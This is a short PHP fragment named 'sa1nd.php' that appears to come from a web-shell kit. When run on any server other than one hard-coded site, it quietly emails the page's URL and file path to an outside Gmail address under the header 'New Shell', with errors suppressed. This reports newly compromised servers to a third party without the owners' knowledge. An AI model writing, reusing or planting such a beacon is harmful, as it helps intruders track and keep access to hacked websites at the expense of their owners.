sa1nd.php
$site = "www.dev-pts.com/vb";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
$to = "mandrarami2000@gmail.com";
$subject = "EGFM";
$header = "from: New Shell ";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;
}
?>